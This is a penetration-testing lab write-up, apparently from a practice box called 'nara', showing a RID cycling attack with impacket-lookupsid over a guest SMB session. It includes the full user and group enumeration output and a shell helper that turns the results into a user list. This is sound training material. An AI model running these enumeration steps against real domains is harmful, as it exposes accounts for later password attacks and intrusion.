RID Cycling Attack


The SMB server on the nara.nara-security.com (192.168.209.30) host allows a guest session with read access to the IPC$ share. This means a RID cycling attack can be used to brute-force RIDs over the LSARPC named pipe and resolve them to domain users and groups.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-lookupsid blah@$IP 1000000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at 192.168.209.30
[*] StringBinding ncacn_np:192.168.209.30[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-914744703-3800712539-3320214069
498: NARASEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: NARASEC\Administrator (SidTypeUser)
501: NARASEC\Guest (SidTypeUser)
502: NARASEC\krbtgt (SidTypeUser)
512: NARASEC\Domain Admins (SidTypeGroup)
513: NARASEC\Domain Users (SidTypeGroup)
514: NARASEC\Domain Guests (SidTypeGroup)
515: NARASEC\Domain Computers (SidTypeGroup)
516: NARASEC\Domain Controllers (SidTypeGroup)
517: NARASEC\Cert Publishers (SidTypeAlias)
518: NARASEC\Schema Admins (SidTypeGroup)
519: NARASEC\Enterprise Admins (SidTypeGroup)
520: NARASEC\Group Policy Creator Owners (SidTypeGroup)
521: NARASEC\Read-only Domain Controllers (SidTypeGroup)
522: NARASEC\Cloneable Domain Controllers (SidTypeGroup)
525: NARASEC\Protected Users (SidTypeGroup)
526: NARASEC\Key Admins (SidTypeGroup)
527: NARASEC\Enterprise Key Admins (SidTypeGroup)
553: NARASEC\RAS and IAS Servers (SidTypeAlias)
571: NARASEC\Allowed RODC Password Replication Group (SidTypeAlias)
572: NARASEC\Denied RODC Password Replication Group (SidTypeAlias)
1000: NARASEC\NARA$ (SidTypeUser)
1101: NARASEC\DnsAdmins (SidTypeAlias)
1102: NARASEC\DnsUpdateProxy (SidTypeGroup)
1103: NARASEC\staff (SidTypeGroup)
1104: NARASEC\Amelia.O'Brien (SidTypeUser)
1105: NARASEC\Damian.Johnson (SidTypeUser)
1106: NARASEC\Helen.Robinson (SidTypeUser)
1107: NARASEC\Sara.O'Sullivan (SidTypeUser)
1108: NARASEC\Jasmine.Roberts (SidTypeUser)
1109: NARASEC\Declan.Reynolds (SidTypeUser)
1110: NARASEC\Jodie.Summers (SidTypeUser)
1111: NARASEC\Carolyn.Hill (SidTypeUser)
1112: NARASEC\Jemma.Humphries (SidTypeUser)
1113: NARASEC\Tracy.White (SidTypeUser)
1115: NARASEC\Remote Access (SidTypeGroup)
1116: NARASEC\Enrollment (SidTypeGroup)

Performing the RID cycling attack with an arbitrary credential (the non-existent username blah) against the target SMB service identified the following domain users:

  • Administrator
  • Guest
  • krbtgt
  • NARA$
  • Amelia.O'Brien
  • Damian.Johnson
  • Helen.Robinson
  • Sara.O'Sullivan
  • Jasmine.Roberts
  • Declan.Reynolds
  • Jodie.Summers
  • Carolyn.Hill
  • Jemma.Humphries
  • Tracy.White

These were saved into the domain_users.txt file.
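Building domain_users.txt from the lookupsid output by hand is error-prone on larger domains, so here is an added helper (not part of the original writeup) that does the filtering step. It assumes the tool's stdout was saved to a file; the sample input below is a subset of the output shown above, and the filter keeps only entries tagged SidTypeUser, which is why the computer account NARA$ (machine accounts end in $) appears alongside the human users, exactly as in the list above.

```shell
#!/bin/sh
# Added example, not from the original writeup: turn impacket-lookupsid
# output into a one-name-per-line user list (the domain_users.txt step).

extract_rid_users() {
    # $1: path to a file holding the saved lookupsid output.
    # Keep only resolved entries of type SidTypeUser, then strip the
    # "RID: DOMAIN\" prefix and the trailing type tag. Names may contain
    # spaces, dots, apostrophes or a trailing $ (machine accounts), so the
    # capture is everything between the backslash and " (SidTypeUser)".
    sed -nE 's/^[0-9]+: .*\\(.*) \(SidTypeUser\)[[:space:]]*$/\1/p' "$1"
}

count_rid_users() {
    # Number of user accounts found, with wc's padding removed.
    extract_rid_users "$1" | wc -l | tr -d ' '
}

# Sample input: a subset of the lookupsid lines shown above, written to a
# temp file so the example runs offline.
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
[*] Domain SID is: S-1-5-21-914744703-3800712539-3320214069
500: NARASEC\Administrator (SidTypeUser)
512: NARASEC\Domain Admins (SidTypeGroup)
1000: NARASEC\NARA$ (SidTypeUser)
1104: NARASEC\Amelia.O'Brien (SidTypeUser)
1115: NARASEC\Remote Access (SidTypeGroup)
EOF

# Usage against a real capture:
#   impacket-lookupsid blah@$IP 1000000 > lookupsid.txt
#   extract_rid_users lookupsid.txt > domain_users.txt
extract_rid_users "$SAMPLE"
printf 'users found: %s\n' "$(count_rid_users "$SAMPLE")"
```

The same pattern works for the group and alias entries (swap SidTypeUser for SidTypeGroup or SidTypeAlias), which is useful when documenting which groups such as Remote Access or Enrollment exist in the domain.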